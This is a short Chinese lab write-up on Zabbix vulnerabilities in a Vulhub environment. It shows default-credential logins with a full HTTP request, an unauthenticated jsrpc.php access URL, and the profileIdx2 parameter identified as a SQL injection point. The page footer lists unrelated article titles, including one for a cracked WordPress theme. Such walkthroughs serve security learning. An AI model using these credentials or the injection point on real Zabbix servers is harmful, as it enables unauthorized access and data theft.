当前位置: 首页 > news >正文

【vluhub】zabbix漏洞

news 来源:原创 2024/9/23 15:24:15

介绍:

zabbix是对服务器资源状态例如、内存空间、CPU、程序运行状态进行检测、设置预警值、短信设置等功能等一款开源工具。配置不当存在未授权,SQL注入漏洞

弱口令

name=admin&password=zabbix

name=guest&password=

POST /index.php HTTP/1.1
Host: 192.168.203.12:8080
Content-Length: 88
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.203.12:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.203.12:8080/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6cmua046gkq78jai8ija37f7f5; tab=0; zbx_sessionid=37a3075c6ba46f1956c5d8d851c2e635
Connection: keep-alive

sid=56c5d8d851c2e635&form_refresh=1&name=admin&password=zabbix&autologin=1&enter=Sign+in

未授权访问直接进入

http://192.168.203.12:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1

 SQL注入

http://192.168.203.12:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1

profileIdx2参数存在注入点

可使用sqlmap跑,此处忽略

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Minos 多主机分布式 docker-compose 集群部署
  • C语言玩一下标准输出——颜色、闪烁、加粗、下划线属性
  • Flink SQL 的工作机制
  • C++学习笔记——模板
  • UNIX 域协议
  • 从零到一使用 Ollama、Dify 和 Docker 构建 Llama 3.1 模型服务
  • 【Golang 面试 - 基础题】每日 5 题(十)
  • AIGC-VDM -Video Diffusion Models论文解读
  • CeoMax总裁主题最新3.8.1破解免授权版/WordPress付费资源素材下载主题
  • PHP完整表单实例
  • 爬虫学习——20.Scrapy框架(2)入门
  • 【开发学习笔记】git的工作区与分支
  • centos7 mysql 基本测试(7)主从并行简单测试
  • Cocos Creator2D游戏开发(6)-飞机大战(4)-敌机产生
  • Spring知识点
  • Bytom交易说明(账户管理模式)
  • canvas实际项目操作,包含:线条,圆形,扇形,图片绘制,图片圆角遮罩,矩形,弧形文字...
  • classpath对获取配置文件的影响
  • CSS 三角实现
  • FastReport在线报表设计器工作原理
  • Golang-长连接-状态推送
  • HTTP--网络协议分层,http历史(二)
  • Linux CTF 逆向入门
  • ng6--错误信息小结(持续更新)
  • Python学习之路16-使用API
  • Python语法速览与机器学习开发环境搭建
  • React 快速上手 - 07 前端路由 react-router
  • React-flux杂记
  • React组件设计模式(一)
  • SQLServer之创建显式事务
  • Vue官网教程学习过程中值得记录的一些事情
  • webgl (原生)基础入门指南【一】
  • Yeoman_Bower_Grunt
  • 短视频宝贝=慢?阿里巴巴工程师这样秒开短视频
  • 基于HAProxy的高性能缓存服务器nuster
  • 基于遗传算法的优化问题求解
  • 类orAPI - 收藏集 - 掘金
  • 聊聊flink的TableFactory
  • 前端性能优化--懒加载和预加载
  • 全栈开发——Linux
  • 使用 Xcode 的 Target 区分开发和生产环境
  • 说说动画卡顿的解决方案
  • 算法-插入排序
  • 文本多行溢出显示...之最后一行不到行尾的解决
  • 一个SAP顾问在美国的这些年
  • HanLP分词命名实体提取详解
  • MPAndroidChart 教程:Y轴 YAxis
  • 教程:使用iPhone相机和openCV来完成3D重建(第一部分) ...
  • ​学习一下,什么是预包装食品?​
  • ###项目技术发展史
  • #APPINVENTOR学习记录
  • #DBA杂记1
  • #HarmonyOS:Web组件的使用
  • #systemverilog# 之 event region 和 timeslot 仿真调度(十)高层次视角看仿真调度事件的发生
  • #基础#使用Jupyter进行Notebook的转换 .ipynb文件导出为.md文件